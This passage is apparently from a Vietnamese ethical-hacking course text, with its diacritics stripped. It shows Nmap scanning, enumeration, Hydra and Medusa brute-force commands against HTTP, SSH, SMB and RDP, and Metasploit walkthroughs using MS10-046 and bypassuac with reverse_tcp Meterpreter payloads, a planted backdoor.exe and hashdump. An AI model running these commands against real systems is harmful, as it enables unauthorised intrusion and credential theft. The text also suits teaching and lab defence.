hin mng v kim ton an ninh. Nhiu qun tr mng v h thng cng

tm thy s hu ch cho cc cng vic nh kim k mng li, dch v

qun l lch trnh, v theo di thi gian hot ng dch v v my ch.

Nmap s dng cc gi tin IP th trong cc phng php mi xc nh

host no c sn trn mng, cc dch v (tn ng dng v phin bn) m

host ang cung cp, h iu hnh g (v cc phin bn h iu hnh)

m h ang chy, loi b lc gi tin hoc tng la no ang s dng,

v nhiu c im khc. N c thit k scan nhanh chng cc mng

34

ln, nhng ho. Nmap chy c trn tt c cc h iu hnh, v cc gi

nh phn chnh thc c sn cho Linux, Windows, v Mac OS X.

Cch dng n gin nht, khng c t tham s: nmap 192.168.10.0/24

Qu trnh c thc hin nh sau:

35

a. Chuyn t hostname thnh Ipv4 s dng DNS. Nu l mt a

ch IP th khng cn chuyn.

b. Thc hin ping ti host, mc nh vi mt gi tin yu cu ICMP echo v

mt g tin TCP ACK gi ti cng 80 xc nh host c ang up hay

khng? Nu khng, nmap s thot v hin thng bo. Chng ta c th s

dung Ping NULL(-PN) b qua bc ny.

c. Chuyn IP ch thnh tn vi truy vn DNS ngc. iu ny c th b

qua vi thuc tnh n ci thin tc v kh nng khng bi pht hin.

d. Thc hin qut TCP port vi hn 1000 port ph bin c lit k ti

nmap-services. Qu trnh scan SYN s c thc hin, nhng Connect

scan s c thay th khi ngi dng Unix khng phi root thiu quyn

cn thit gi cc gi tin th.

e. In kt qua ln mn hnh

Qut host ang up: nmap sP PE 192.168.10.0/24

-sP: ping scan

-PE: ping echo

36

Ph thuc vo phc tp ca mng ch v cc host, qu trnh qut c

th d dng b pht hin.Nmap cung cp kh nng lm gi a ch ngun

vi ty chn Ddecoy. N c to ra lm trn ngp ci site ch vi

nhng thng tin gi mo. Th c bn nm pha sau ty chn ny l chy

scan gi cng lc vi scan tht. H thng ch s tr li trn cc a ch

gi cng nh scan port thc ca chng ta. V quan trng hn c l a

ch gi phi cn sng. Ngc li, qu trnhscan vi SYN v dn n iu

kin t chi dch v

Nmap sSPE 192.168.10.0/24 D 10.10.10.1

37

d) Phng chng:

Tt tt c cc dch v khng cn thit. Trn Unix, chng ta c th thc hin

iu ny bng cch xem cc dch v khng cn thit trong /ect/inetd.conf v tt cc

dch vscript lc khi ng. Trn Windows, rt kh tt cc dch v khng cn thit

v theo cch hot ng ca Windows, cng TCP 139 v 445 cung cp nhiu chc nng

Windows hot ng.

3. Xc nh h iu hnh

Nhiu cng c mnh v nhiu k thut qut port c sn tm cc cng m trn

h thng ch. Nu nhn li, i tng u tin ca chng ta l qut cng xc nh

cc cng TCP v UDP trn my ch. V vi nhng thng tin , chng ta c th cng

no ang lng nghe c im yu no chng? Nhng chng ta cn tm nhiu

thng tin hn v mc tiu. chnh l xc nh h iu hnh.

a) Active OS Detection

Thng tin cng chi tit v h iu hnh th n cng hu ch trong vic phn

tch im yu. chng ta c th s dng k thut banner-grabbing, th ly thng tin t

cc dch v FTP, telnet, SMTP, HTTP. y l cch n gin nht pht hin h iu

hnh v phin bn m n ang chy. Theo , k thut ng n l k thut stack

fingerprinting. N l mt k thut rt mnh cho php chng ta bit chc h iu hnh

ch vi tin cy cao. Stack fingerprinting s yu cu ch nht mt cng ang lng

nghe. Nmap c on c trong trng hp khng c cng no ang m.

38

Active OS detection gi cc gi tin n ch xc nh im c trng chi

tit trong stack mng, iu ny cho php chng ta on h iu hnh. V phi gi cc

gi tin nh th, nn rt d dng b pht hin. v th y khng phi l cch m hacker

p dng tn cng.

Nmap vi O xc nh h iu hnh.

b) Passive OS Detection

S dng passive stack fingerprinting. N tng t nh khi nim active

stack fingerprinting. Thay v gi cc gi tin ti ch d dnh b pht hin. K tn

cng m thm gim st giao thng mng xc nh h iu hnh ang s dng. V

vy, bng vic gim st giao thng mng gia cc h thng khc nhau, chng ta c th

xc nh c h iu hnh. K thut ny ph thuc vo v tr trung tm trn mng v

trn cng cho php bt gi tin.

39

Chng 4: ENUMERATION

I. Enumeration l g?

Enumeration (Lit k) l bc tip theo trong qu trnh tm kim thng tin ca

t chc , xy ra sau khi scanning v l qu trnh tp hp v phn tch tn ngi

dng, tn may,ti nguyn chia s v cc dch v . N cng ch ng truy vn hoc kt

ni ti muc tiu co c nhng thng tin hp l hn . Enumeration (lit k) c th

c nh ngha l qu trnh trch xut nhng thng tin c c trong phn scan ra

thnh mt h thng c trt t. Nhng thng tin c trch xut bao gm nhng th c

lin quan n mc tiu cn tn cng, nh tn ngi dng (user name), tn my tnh

(host name), dch v (service), ti nguyn chia s (share).Nhng k thut lit k c

iu khin t mi trng bn trong. Enumeration bao gm c cng on kt ni n

h thng v trc tip rt trch ra cc thng tin. Mc ch ca k thut lit k l xc nh

ti khon ngi dng v ti khon h thng c kh nng s dng vo vic hack mt

mc tiu . Khng cn thit phai tim mt tai khoan quan tri vi c hng ta c th tng tai

khon ny ln n mc co c quyn nht cho phep truy cp vao nhiu tai khoan

hn a cp trc y.

II. Banner Grabbing

K thut ch yu nht ca enumeration l banner grabbing, N c th c

nh ngha n gin nh l kt ni n ng dng t xa v quan st u ra. N c nhiu

thng tin cho k tn cng t xa. t nht chng ta cng xc nh c m hnh dch

v ang chy m nhiu trng hp l to nn qu trnh nghin cu cc im yu.

Phng chng: tt cc dch v khng cn thit. chng ta c th gii hn vic truy

cp ti cc dch v iu khin truy cp mng.

III. Enumerating cc dch v mng

1. Http fingerprinting

a) Telnet

TELNET (vit tt ca TerminaL NETwork) l mt giao thc mng (network

protocol) c dng trn cc kt ni vi Internet hoc cc kt ni ti mng my tnh

cc b LAN. Ti liu ca IETF, STD 8, (cn c gi l RFC 854 v RFC 855) c ni

rng: Mc ch ca giao thc TELNET l cung cp mt phng tin truyn thng

chung chung, c tnh lng truyn, dng rng 8 bit, nh hng byte. TELNET l

mt giao thc khch-ch (client-server protocol), da trn nn TCP, v phn khch

(ngi dng) thng kt ni vo cng 23 vi mt my ch, ni cung cp chng trnh

ng dng thi hnh cc dch v.

40

S dng telnet tm hiu thng tin t cng dch v ang m, s dng cng c

t xa ly thng tin thng qua cng telnet m hu ht cc h iu hnh iu h tr.

C:\>telnet www.google.com 80

b) Netcat

L mt tool cho php ghi v c data thng qua giao thc TCP v UDP. Netcat

c th s dng nh port scanner, backdoor, port redirecter, port listener,

S dng netcat bng dng lnh:

- Ch kt ni : nc [-ty_chn] tn_my cng1[-cng2]

- Ch lng nghe: nc -l -p cng [-ty_chn] [tn_my] [cng]

V d:

Ly banner ca Server:

nc n 192.168.10.102, cng 80

Qut cng

41

chy netcat vi ty chn -z. V d scan cc cng TCP(1->500) ca host

192.168.10.102

nc v www.google.com 80

www.google.com [74.215.71.105] 80 (http) open

c) Open SSL

L s n lc hp tc nhm pht trin b m ngun m vi y tnh nng,

c trin khai trn giao thc SSL (version 2 v version 3) vgiao thc TSL(version 1)

c qun l bi cng ng nhng ngi tnhnguyn trn ton th gii s dng

Internet kt ni v pht trin bOpenSSL v cc ti liu c lin quan.

Hu ht cc phn mm nh IMAP&POP, Samba, OpenLDAP, FTP,Apache v

nhng phn mm khc u yu cu cng vic kim tra tnh xcthc ca ngi s dng

trc khi cho php s dng cc dch v ny. Nhngmc nh vic truyn ti s xc

minh thng tin ngi s dng v mt khu(password) dng vn bn thun ty nn c

th c c hoc thay i bimt ngi khc. K thut m ha nh SSL s m bo

tnh an ton v nguynvn ca d liu, vi k thut ny thng tin truyn trn mng

dng im niim c m ha. Mt khi OpenSSL c ci t trn Linux

server chng ta c th s dng n nh mt cng c th ba cho php cc ng dngkhc

dng tnh nng SSL

OpenSSL l mt b cng c mt m trin khai trn giao thc mng SSLv TLS

v cc chun mt m c lin quan. Chng trnh OpenSSL l mt cng c dng lnh

42

s dng cc chcnng mt m ca cc th vin crypto ca OpenSSL t nhn.

OpenSSL c cc th vin cung cp cc chc nng mt m cho cc ngdng nh an

ton webserver.

L phn mm m ngun m , c th s dng c cho c mc ch thng mi

v phi thng mi vi tnh nng m ho mnh trn ton th gii, h tr cc giao

thc SSLv2 v SSLv3 v TLSv1, cho c php m ho RSA v Diffie-Hellman, DSO.

H tr cho OpenSSL v RSArefUS, nng cao kh nng x l cm mt khu i vi

kho ring .Chng ch X.509 da vo xc thc cho c pha client v server, H tr

danh sch thu hi chng ch X.509, kh nng ti iu chnh i vi mi URL ca cc

tham s bt tay SSL.

2. DNS Enumeration

DNS Enumeration l qu trnh nh v tt c cc my ch DNS v tng ng

ca h h s cho mt t chc. Mt cng ty c th c c hai ni b v bn ngoi my

ch DNS c th mang li thng tin nh tn ngi dng, tn my tnh, v a ch IP ca

h thng mc tiu tim nng. Hin c rt nhiu cc cng c c th c s dng c

c thng tin cho thc hin DNS lit k. Cc v d v cc cng c c th c s

dng lit k DNS nslookup, DIN, Registry M cho s Internet (ARIN), v Whois.

k khai DNS, chng ta phi c s hiu bit v DNS v lm th no n hot ng.

Chng ta phi c kin thc v cc bn ghi DNS. Danh sch cc bn ghi DNS

cung cp mt ci nhn tng quan cc loi bn ghi ti nguyn (c s d liu h s) c

lu gi trong cc tp tin khu vc ca tn min System (DNS). DNS thc hin mt c

s d liu phn tn, phn cp, v d phng thng tin lin kt vi cc tn min Internet

v a ch. Trong nhng min my ch, cc loi h s khc nhau c s dng cho cc

mc ch khc nhau. Danh sch sau y m t bn ghi DNS ph bin cc loi v s

dng ca h:

A (a ch)-Bn mt tn my ch n mt a ch IP

SOA (Start of Authority)-Xc nh my ch DNS c trch nhim cho cc tn

min thng tin

CNAME (tn kinh in)-Cung cp tn hoc b danh cho a ch ghi

MX (th trao i) Xc nh cc my ch mail cho tn min

SRV (dch v)-Nhn dng cc dch v nh dch v th mc

PTR (pointer)-Bn a ch IP lu tr tn

NS (tn my ch)-Xc nh my ch tn khc cho tn min

43

DNS Zone Transfer thng c s dng ti to d liu DNS trn mt s

my ch DNS, hoc sao lu cc tp tin DNS. Mt ngi s dng hoc my ch s

thc hin mt yu cu chuyn giao khu vc c th t mt name server.Nu my ch

tn cho php di chuyn vng xy ra, tt c cc tn DNS v IP a ch lu tr bi cc

my ch tn s c tr li trong vn bn ASCII con ngi c th c c.

Nslookup

Ta cng c th dng lnh trc tip nh sau:

Nslookup type=any tuoitre.vn

Type l loi dch v mng, nh lit k trn: NS(nameserver), MX(mail

exchange), any(tt c).

Tuoitre.vn: mt domain

44

3. Netbios name

NetBIOS l mt t vit tt cho mng Basic Input / Output System. N cung cp

cc dch v lin quan n lp phin ca m hnh OSI cho php cc ng dng trn cc

my tnh ring giao tip qua mt mng cc b. Tht s nh mt API, NetBIOS

khng phi l mt giao thc mng. H iu hnh c hn chy NetBIOS trn IEEE

802,2 v IPX / SPX s dng tng ng giao thc Frames NetBIOS (NBF) v

NetBIOS trn IPX / SPX (NBX) . Trong cc mng hin i, NetBIOS bnh thng

chy trn giao thc TCP / IP thng qua NetBIOS qua giao thc TCP / IP (NBT) .iu

ny dn n tng my tnh trong mng c c mt tn NetBIOS v mt a ch IP tng

ng vi mt (c th khc nhau) tn my ch.

NetBIOS name l c ch t tn cho cc ti nguyn trong 1 h thng theo

khng gian phng (khng c khi nim phn cp).

45

Chng 5: PASSWORD CRACKING

I. Gii Thiu

L qu trnh tm kim hoc phc hi password vi nhiu mc ch khc nhau.

Mc ch ca vic password cracking l gip cho ngi dng c th ly li mt

khu qun trc , hoc chim ot quyn truy cp khng xc thc ti h

thng.

II. Cc K Thut Password Cracking

1. Dictionary Attacks/Hybrid Attacks

Attacks s s dng file t in c sn cha cc hash so snh vi hash

ca password tm ra dng plaint text ca password nu hash trng

nhau.

Chng ta c th thm hoc o cc t c trong t in (Hybird Attacks).

Dng ny ng dng tt khj password l nhng k t thng thng, tc

nhanh, mc thnh cng ty thuc vo t in.

2. Brute Forcing Attacks

S dng mi t hp ca tt c cc k t a vo hash v so snh. Kh nng

thnh cng l tuyt i nu c thi gian v tc crack rt lu trong trng hp

password di v phc tp. ch tt cho password ngn.

3. Syllable Attacks/Pre-Computed Hashes

Kt hp hai cch trn bng cch to sn cc bn hash ca tt c t hp cc k t

v ch so snh trong qu trnh hash. Tc crack ch mt vi pht nu c sn cc bn

hash.

III. Cc Kiu Tn Cng Thng Gp

1. Active Password Cracking

Tm 1 username co thc va do tim password theo username o .Qu trnh

ny c th t ng ho tng tc tm kim .

Cc dng tn cng kiu Active Password Cracking:

o Password guessing: mt tp hp t in cc t v tn cng nh

mt khu v th tt c s kt hp crack cc password. Kiu tn

cng ny cn nhiu thi gian v lng bng thng mng ln; d

dng bi pht hin.

o Trojan/Spyware/Keylogger: l chng trnh chy nn gip cho k

tn cng c th ghi li bt k phm no c nhn (Keylogger);

1X42FHighlight

46

thu thp thng tin mt cch b mt v c nhn, t chc (Spyware);

vi s gip ca Trojan, k tn cng c th ly quyn truy cp

vo cc password c lu tr v c th c cc ti liu c nhn,

xa file.

2. Passive Password Cracking

Capture qua trnh log -in trn ng truyn break password

offline(Sniff, MITM)

Cc kiu tn cng ny bao gm:

o Wire Sniffing: k tn cng chy cc cng c sniffing gi tin trong

mng LAN truy cp v ghi li cc giao thng mng ang sng.

D liu bt c c th s bao gm password c gi ti cc h

thng t xa thng qua cc giao dch Telnet, FTP, rlogin v mail

in t gi v nhn.

o Man-in-the-Middle (MITM) and Replay Attack: Trong tn cng

MITM, attacker ginh quyn truy cp vo knh giao tip gia nn

nhn v server tm kim thng tin; trongreplay attack, cc gi

tin v th bi (token) xc thc c bt s dng mt sniffer.

3. Offline Password Cracking

Tip xc trc tip vi my tnh nn nhn copy cc file lu tr thng tin. V

d, SAM database trn Windows (%systemroot%/system32/config) hay /root/passwd

trn Linux. Sau c th s dng John tm password dang plain text.

IV. Cc cng c Password Cracking

1. Hydra

a) Gii thiu

Hydra l mt cng c b kha ng nhp mng rt nhanh, h tr nhiu giao

thc v dch v khc nhau.

Hydra l trnh b kha ng nhp xong xong, ngha l n chy nhiu tc v

cung mt lc qu trnh b kha c nhanh hn.

Cng c ny cho php cc nh nghin cu v chuyn gia bo mt c th

trnh by mc d dng chim quyn truy cp khng xc thc t xa ti h

thng no

1X42FHighlight

47

b) Cch dng

C php chung ca Hydra l:

Hydra [[-l LOGIN|-L FILE] [-p PASSWORD|-P FILE]]|[-C FILE]] [-t task] [-w

wait] [server server | IP] [service://server[:port]]

V d:

48

hydra f L login.txt P password.txt 192.168.10.1 http-get

http://192.168.10.1

Trong :

-f: finish:tm c cp username v password hp l u tin s kt thc

-L: file username (-l username)

-P: file password (-p password)

192.168.10.1: a ch ip cn b kha mt khu ng nhp

http-get: dch v http cng 80 (http c thay th bng http-get v http-

head)

http://192.168.10.1 l trang web cn cho qu trnh crack.

2. Medusa

a) Gii thiu

Medusa c th c s dng brute-force ng nhp theo tng module theo c

ch song song v nhanh chng. mc ch ca n l h tr nhiu dch v m c th

cho php qu trnh xc thc t xa nu c th.

Medusa c thit k da vo ba c im sau:

Kim tra song song da vo lung: c th kim tra trn nhiu host, username,

password.

Thit k theo module: Mi dch v tn ti dng file (.mod) c lp. Chng ta

khng cn thit chnh sa n nhn m rng danh sch cc dch v h tr for

vic brute-forcing.

49

b) Cch dng

C php:

Medusa [h host | -H file] [-u username | -U file] [-p password | -P file] [-C

file] M module [OPT]

-h host hay a ch IP, -H file cha cc host

50

-u username, -U file cha username

-p password, -P file cha password

-C file kt hp dng host, username, password dng host:username:password

-M module l bt buc theo sau l tn cc module c h tr. xem tt c

cc module ta g: medusa d v cch dng chi tit cho 1 module no : medusa M

tn_module q

51

V. Password Cracking Trn Cc Giao Thc

1. HTTP (HyperText Tranfer Protocol)

c) Khi nim

y l giao thc chuyn i siu vn bn v thng c s dng cho cc

ng dng Web (World Wide Web WWW) trn cng mc nh l 80.

d) C 2 dng m ha HTTP:

Basic access authentication: l phng php trnh duyt web hoc cc

chng trnh khc cung cp username v password when c yu cu. N h tr

tt c cc trnh duyt web, tuy nhin, c username v password c gi i dng

plain text nn t c p dng vo thc t. V qu trnh ng nhp vo router l

mt v d in hnh.

1X42FHighlight

1X42FHighlight

52

Chng ta c th dng Wireshark bt:

53

Nh trn hnh username v password bt c: admin:12345

Digest access authentication: l mt trong nhng phng php c tha

thun p dng cho my ch web c th vt qua cc thng tin vi

trnh duyt web ca ngi dng. N s dng hm bm(hash) m ha

cc thng tin nhy cm trc khi gi chng qua mng.

e) Crack Password HTTP

Ta c th dng nmap (Network Mapper) qut cng no ang m:

54

Truy cp vo trinh duyt kim tra th qu trnh xc thc

Khi nhn nt Cancel ta c thng bo:

55

Vo Terminal trn BackTrack 5 g: hydra f L login.txt P password.txt

192.168.10.1 http-get http://192.168.10.1

Trong :

-f: finish:tm c cp username v password hp l u tin s kt thc

-L: file username (-l username)


192.168.10.1: a ch ip cn b kha mt khu ng nhp

http-get: dch v http cng 80 (http c thay th bng http-get v http-

head)

http://192.168.10.1 l trang web cn cho qu trnh crack.

56

Hoc: medusa h 192.168.10.1 U login.txt P password M http

Trong :

-h host hay a ch ip cn b kha mt khu ng nhp.

-U: file username (-u username)


-M http giao thc cn crack. M vit tc cho modum

57

Sau quay li trinh duyt web, ta nhp username v password tm c:

58

2. SSH (Secure Shell)

a) Khi nim

SSH l mt giao thc mng cho vic giao tip d liu bo mt, cc dch v

shell t xa hoc thc thi lnh vn cc dch v mng bo mt khc gia cc my tnh

c ni mng vi nhau. N kt ni thng qua mt knh bo mt trn mt mng

khng bo mt: mt my ch v mt my khch (chy cc chng SSH server v

SSH Client).

ng dng c bit n nhiu nht ca giao thc ny l vic truy cp n

ti khon shell ca h iu hnh LIKE-UNIX (LINUX). N sinh ra thay th cc

chun giao thc khng bo mt khc nh telnet, rsh, rexec , khi m password

c gi i dng plain text, c th d dng c c.

SSH hot ng trn TCP cng 22.

b) Crack password qua SSH

Kim tra dch v ssh c ang chy hay khng?

Vi hydra: hydra f L login.txt P password.txt 192.168.10.101 ssh

59

Vi Medusa: medusa h 192.168.10.101 U login.txt P password.txt M

ssh

V y l cch truy cp vo thit b Nokia N900 t xa vi username v

password va tm c:

60

V d kim tra cc card mng t xa:

61

3. SMB (Server Message Block)

a) Khi nim

SMB c bit n nh l Common Internet File System (CIFS), hot ng

tng ng dng trong m hnh OSI, thng thng c s dng cung cp

truy cp chia s cc file, my in v cc giao tip khc nhau gia cc nt mng

trn mng. N cn cung cp k thut giao tip lin qu trnh c xc thc. Hu ht

s dng ca SMB u lin quan n Microsoft Windows.

SMB c th chy trn tng giao dch (Session) hoc thp hn:

o Trc tip trn TCP cng 445;

o Thng qua NetBIOS (cung cp nhiu dch v lin quan n tng

ng dng trong m hnh OSI cho php cc ng dng trn cc my

tnh phn bit c th giao tip vi nhau thng qua mng LAN)

trn UDP cng 137, 138 v TCP 137, 139

b) Crack password SMB

Qut xem c my no ang chy dch v smb port 445 hay khng?

62

Vi Hydra tao g: hydra f L login.txt P password.txt 192.168.10.100 smb

Vi Medusa, ta g: medusa h 192.168.10.100 U login.txt P password.txt

smbnt

63

V y l cch chng ta s dng username v password va tm c

64

4. RDP (Remote Desktop Protocol)

a) Khi nim

RDP l mt giao thc giao tip ca c nhn hay t chc c pht trin bi

Microsoft, cung cp cho ngi dng mt giao din ha i vi my tnh khc.

Hin ti, Microsoft chuyn phn mm ch (server) RDP sang Remote

Desktop Services nh Terminal Services (dch v u cui) v phn mm khch

(client) nh l Terminal Services Client.

Khi thc hin kt ni n mt my tnh no t xa, chng ta s nhn c

yu cu xc thc ngi dng v mt khu ph hp. V vy vic crack password

RDP l cn thit nu ta truy cp m cha c s chp nhn ca ngi dng.

RDP hot ng trn TCP cng 3389

b) Crack password RDP

Qut my tnh xem no c cng 3389 ang m hay khng?

1X42FHighlight

65

Vi Hydra: hydra f L login.txt P password.txt 192.168.10.100 rdp t 4

w 1

Vi Medusa, n khng h tr trc tip giao thc RDP. Tuy nhin, ta c th

dng modum wrapper vi script l rdesktop. Ta thc hin nh sau:

66

Medusa M wrapper m TYPE:STDIN m PROG:rdesktop m ARGS:-u

%U p - %H h 192.168.10.100 U login.txt P password.txt

Tuy vy, chng trnh vn hot ng cha ng n lm v tn nhiu thi gian

v phi k tn cng phi nhp vo tng password mt.

y l cch dng rdesktop iu khin my tnh t xa vi username v

password tm c:

67

Chng 6: SYSTEM HACKING

I. GII THIU V METASPLOIT

1. Gii thiu

Metasploit l mt d n bo mt my tnh cung cp cc thng tin v vn l

hng bo mt cng nh gip v kim tra thm nhp v pht trin h thng pht hin

tn cng mng. Mt d n con rt ni ting ca Metasploit l Metasploit Framework.

Metasploit Framework l mt mi trng dng kim tra ,tn cng v khai

thc li ca cc service. Metasploit c xy dng t ngn ng hng i tng Perl,

vi nhng components c vit bng C, assembler, v Python.Metasploit c th chy

trn hu ht cc h iu hnh: Linux, Windows, MacOS. Chng ta c th download

chng trnh ti www.metasploit.com

Metasploit c phin bn hin ti l 4.4.

2. Cc thnh phn ca Metasploit

Metasploit h tr nhiu giao din vi ngi dng:

Console interface: dng lnh msfconsole. Msfconsole interface s dng cc dng lnh cu hnh, kim tra nn nhanh hn v mm do hn

Web interface: dng msfweb, giao tip vi ngi dng thng qua giao din web

Command line interface: dng msfcli

Enviroment :

Global Enviroment:c thc thi thng qua 2 cu lnh setg v unsetg, nhng options c gn y s mang tnh ton cc, c a vo tt c cc module exploits

Temporary Enviroment: c thc thi thng qua 2 cu lnh set v unset, enviroment ny ch c a vo module exploit ang load hin ti, khng nh hng n cc module exploit khc

Chng c th lu li enviroment mnh cu hnh thng qua lnh save. Mi

trng s c lu trong ./msf/config v s c load tr li khi user interface

c thc hin

3. S dng Metasploit Framework

a) Chn module exploit

La chn chng trnh, dch v li m Metasploit c h tr khai thc

68

show exploits: xem cc module exploit m framework c h tr

use exploit_name: chn module exploit

info exploit_name: xem thng tin v module exploit

Chng ta nn cp nht thng xuyn cc li dch v cng nh cc module

trn www.metasploit.com hoc qua lnh msfupdate hoc svn update

/opt/metasploit/msf3/

b) Cu hnh module exploit chn

show options: Xc nh nhng options no cn cu hnh

set : cu hnh cho nhng option ca module

Mt vi module cn c nhng advanced options, chng ta c th xem bng

cch gdng lnh show advanceds

c) Verify nhng options va cu hnh

check: kim tra xem nhng option c set chnh xc cha.

d) La chn target

La chn h diu hnh no thc hin

show targets: nhng target c cung cp bi module

set: xc nh target no

vd: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

e) La chn payload

Payload l on code m s chy trn h thng remote machine, l mt

phn ca virus my tnh thc thi m c.

show payloads: lit k ra nhng payload ca module exploit hin ti

info payload_name: xem thng tin chi tit v payload

set payload payload_name: xc nh payload module name.Sau khi

la chn payload no, dng lnh show options xem nhng options

ca payload

show advanced: xem nhng advanced options ca payload

f) Thc thi exploit

exploit: lnh dng thc thi payload code. Payload sau s cung

cp cho chng ta nhng thng tin v h thng c khai thc

4. Gii thiu Payload Meterpreter

Meterpreter, vit tt t Meta-Interpreter l mt payload nng cao c trong

Metasploit Framework. Muc ch ca n l cung cp nhng tp lnh khai thc,

69

tn cng cc my remote computers. N c vit t cc developers di dng shared

object (DLL) files. Meterpreter v cc thnh phn m rng c thc thi trong b nh,

hon ton khng c ghi ln a nn c th trnh c s pht hin t cc phn mm

chng virus

Meterpreter cung cp mt tp lnh chng ta c th khai thc trn cc remote

computers:

Fs(Filesystem): cung cp qu trnh tng tc vi filesystem

Net: cho php xem thng tin mng ca remote machine nh IP, route

table

Process:cho php to tng tc vi cc tin trnh trn remote

machine

Sys: cho php xem thng tin h thng, mi trng ca remote

machine

a) S dng module Fs

cd directory:ging lnh cd ca commandline, chuyn th mc lm

vic

getcwd:cho bit th mc ang lm vic hin ti

ls:lit k cc th mc v tp tin

upload src1 [src2 ...] dst:upload file t src ti dst.

download src1 [src2 ...] dst:download file t src ti dst.

b) S dng module Net

ipconfig:xem cu hnh ca card mng ca my tnh t xa

route:xem bng nh tuyn ca remote machine

c) S dng module Process

execute -f file [ -a args ] [ -Hc ]:Cu lnh execute cho php to ra

mt process mi trn remote machine v s dng process khai

thc d liu

kill pid1 pid2 pid3:hu hoc tt cc process ang chy trn my

remote machine

ps:lit k nhng process ca remote machine

d) S dng module Sys

getuid: cho bit username hin ti ca remote machine

sysinfo:cho bit thng tin v my tnh nn nhn: h iu hnh, phin

bn, nn tn 32bits hay 64bits

70

5. Cch phng chng

Thng xuyn cp nht cc bn v li ca Microsofts. V d nh Metasploit

khng th khai thc c li Lsass_ms04_011, chng ta phi cp nht bn v li ca

Microsoft. Theo Microsoft nh gi, y l mt li nghim trng, c trn hu ht tt c

cc h iu hnh windows. Chng ta nn s dng hotfix c number l 835732 v li

trn.

II. Li MS10-046 (2286198)

1. Gii thiu

y l mt li rt nghim trng lin quan n Windows Shellca cho tt c cc

h iu hnh b nh hng, cho php k tn cng chim ly ton quyn iu khin

Windows v thc thi m ngun t xa. Li ny c pht hin vo thng 06/2010 v

n thng 08/2010, Microsoft tung ba bn v li.

Li nguy him ny nm trong cc tp tin "shortcut" (*.lnk) ca Windows, cc

tp tin ny thng nm giao din desktop hay trnh n Start. Bng cch to ra mt

tp tin shortcut nhng m c, tin tc c th t ng thc thi m c khi ngi dng

xem tp tin shortcut hay ni dung ca mt th mc cha tp tin shortcut nhng m

c.

Cc bn Windows b nh hng bao gm.

71

2. Cc bc tn cng:

Saukhi khi ng BackTrack v ang nhp thnh cng, ta khi ng

Terminal ta c:

Ta g tip: msfconsole v enter:

H iu Hnh

Windows XP Service Pack 3

Windows Server 2008 for 32-bit Systems

and Windows Server 2008 for 32-bit

Systems Service Pack 2*

Windows XP Professional x64 Edition

Service Pack 2

Windows Server 2008 for x64-based

Systems and Windows Server 2008 for

x64-based Systems Service Pack 2*

Windows Server 2003 Service Pack 2

Windows Server 2008 for Itanium-based

Systems and Windows Server 2008 for

Itanium-based Systems Service Pack 2

Windows Server 2003 x64 Edition Service

Pack 2 Windows 7 for 32-bit Systems

Windows Server 2003 with SP2 for

Itanium-based Systems Windows 7 for x64-based Systems

Windows Vista Service Pack 1 and

Windows Vista Service Pack 2

Windows Server 2008 R2 for x64-based

Systems*

Windows Vista x64 Edition Service Pack 1

and Windows Vista x64 Edition Service

Pack 2

Windows Server 2008 R2 for Itanium-

based Systems

72

dng m li ms10-046: search ms10-046 v enter

Ta g tip:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader v

enter

73

Dng lnh: show options xem cc tham s cn thit c th tin

hnh tn cng c:

o SRVHOST: a ch my ca k tn cng, lng nghe c nn

nhn no kt ni n hay khng

o SRVPORT: cng lng nghe, mc nh l http (80)

74

Ta s:

o set PAYLOADwindows/meterpreter/reverse_tcp

o set SRVHOST 192.168.1.200

o set lhost a ch IP: set LHOST 192.168.1.200. LHOST l

tham s ca PAYLOAD m ta va set trn.

exploit khi ng server lng nghe trn my tnh tn cng

75

Trn my tnh nn nhn, to 1 shortcut bng cch nhn phi chut vo

Desktop -> New -> Shortcut

76

Ta g vo a ch ca my tn cng vo Type the location of the item:

http://192.168.1.200/anythingv chn Next

t tn cho shortcut va mi to v nhn Finish. Ta s m shortcut ny:

77

i mt lt, trn my tnh tn cng ta c:

Dng lnh sessions xem cc phin lm vic m Metasploit ang c:

78

tng tc vi 1 session no ta thc hin: sessions i 1 (1 l id ca

sessions)

V by gi th mi vic tr nn d dng hn, khi k tn cng iu khin

c my nn nhn vi ton quyn. V d:

Lnh sysinfo ly thng tin ca my nn nhn:

Lnh hashdump ly mt khu ca ngi dng di dng hash

79

Lnh rt hu ch s dng cmd (command-line): shell

3. Cch phng chng

Thng xuyn cp nht cc bn v li ca Windows trch b hacker li

dng.

80

Bn v li c tn m l KB2286198 cha ng phin bn mi ca tp tin

Shell32.dll, y l phn cp nht quan trng. Shell32.dll l mt tp tin th vin rt

quan trng trong Windows, n cha ng mt s hm Windows Shell API. Nu

Shell32.dll b li hay cp nht li, my tnh s c tnh trng "Mn hnh xanh cht chc"

hay Blue Screen.

III. Li BYPASSUAC

1. Gii thiu

T Windows Vista tr v sau, Microsoft gii thiu mt tin ch c xy

dng sn l User Access Control (UAC). UAC lm tng tnh bo mt ca Windows

bng cch gii hn cc phn mm ng dng ca nhm quyn ngi s dng c bn.

V vy, ch nhng phn mm c ngi dng tin tng mi nhn c quyn qun

tr, nhng phn mm khc th khng. Tuy nhin, vi ti khon ca ngi qun tr, cc

ng dng vn b gii hn nh nhng ti khon thng khc.

Cc h iu hnh c tch hp sn User Access Control iu b nh hng v c

th khai thc.

2. Cc bc tn cng

Vo Terminal, g msfconsole v Enter:

use exploit/multi/handler. y l mt modume cung cp nhiu chc

nng ca h thng payload Metasploit cho chng ta khai thc bng cch

81

thc hin: run post/windows/escalate/bypassuac nh l v d trong

trng hp ny v cn nhiu th khc na.

set PAYLOAD windows/meterpreter/reverse_tcp: cho php kt ni

li vi my tnh tn cng d dng iu khin.

set LHOST 192.168.1.202: host lng nghe, a ch IP ca my tn cng

set LPORT 6789:port lng nghe, ty min l cha c s dng.

exploit bt u khi ng server.

82

Ta s to ra mt con backdoor cho php kt ni n server m chng ta khi ng sn trc .

83

Sau khi to xong, ta copy file backdoor.exe n my tnh nn nhn v

thc thi. Chng ta c th s dng Samba chia s file gia Windows v

Linux.

Trn my tnh Windows, ta s share file vi ton quyn truy cp:

84

Tr li my tnh nn nhn, v thc thi file backdoor.exe va copy. Khi

trn my tnh nn nhn chng ta s nhn c nh sau:

Ta c 1 phin lm vic vn cha iu khin ton quyn c. thc hin

ta cn thc hin lnh: run post/windows/escalate/bypassuac

85

Chng ta c th xem tt c cc lnh h tr bng lnh: help

3. Cch phng chng

Rt tic l cho n thi im hin ti, Microsoft vn cha xc nhn li trong

UAC cng nh cung cp bn v cho l hng bo mt ny. Mt pht ngn vin ca

Microsoft khng nh khng c l hng vo trong UAC c. V th, chng ta cn ci t

